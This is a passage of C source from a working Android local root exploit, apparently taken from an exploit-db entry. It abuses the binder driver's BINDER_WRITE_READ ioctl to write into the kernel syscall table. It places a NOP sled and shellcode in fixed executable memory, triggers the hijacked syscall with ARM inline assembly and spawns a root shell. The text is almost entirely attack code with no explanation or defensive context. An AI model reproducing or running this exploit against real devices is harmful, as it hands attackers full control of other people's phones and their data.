    fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno));
    exit(EXIT_FAILURE);
  }

  map = mmap((void *)MMAP_AREA, NUM_PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
             MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_LOCKED, 0, 0);
  if(map == (void *)-1) {
    perror("mmap() ");
    exit(EXIT_FAILURE);
  }

  fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map);
  fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map);
  memset(map, NOP, MMAP_OFF);

  fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF);
  /* look at the objdump of shellcode to see the correct offset */
  memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offsetting to the __transgressor */,
         30 * sizeof(void *) /* copy all opcodes */);

  fprintf(stderr, "[+] constructing rogue data structure.\n");
  bwr.write_size = 0;
  bwr.write_consumed = 0;
  bwr.read_size = 1;
  bwr.read_consumed = 0;
  /* targeting the aperture between 2 undefined system calls in the table */
  bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2);

  /* calculate process descriptor address with the aid of sp:
   * task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3); */
  ioctl(fd, BINDER_WRITE_READ, &bwr);
  close(fd);

  sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */

  fprintf(stderr, "[+] r00ting device...\n\n");
  asm volatile(
    "mov r7, %0\n\t"
    "swi 0\n\t"
    : : "I" (TARGET_APERTURE)
  );

  execve(shell[0], shell, NULL);
  return EXIT_FAILURE;
}
```

Source: http://www.exploit-db.com/exploits/31574/